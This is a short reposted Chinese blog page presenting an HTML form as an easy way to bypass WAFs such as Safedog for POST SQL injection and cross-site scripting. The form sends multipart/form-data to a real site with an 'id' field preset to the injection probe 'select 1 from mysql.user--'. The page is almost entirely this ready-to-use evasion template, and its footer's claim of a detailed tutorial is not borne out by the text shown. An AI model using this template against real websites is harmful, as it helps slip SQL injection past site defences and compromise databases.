原标题:轻松绕各种WAF的POST注入、跨站防御(比如安全狗)
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>轻松绕各种WAF的POST注入、跨站防御(比如安全狗)</title>
</head>
<body>
<form action="http://www.8090sec.com/index.php" method="POST" enctype="multipart/form-data">
File:<input type="file" name="file" /><br/>
ID:<input type="text" name="id" value="select 1 from mysql.user--" style="width:250px;" / ><br/>
<input type="submit" value="提交" />
</form>
</body>
</html>
转载自:http://www.8090sec.com/jiaobenshentou/111630.html
作者: p2j 园长
本文详细介绍了如何绕过常见的WAF(如安全狗)的POST注入和跨站防御机制,提供了实用的绕过方法和代码示例。
1278

被折叠的 条评论
为什么被折叠?



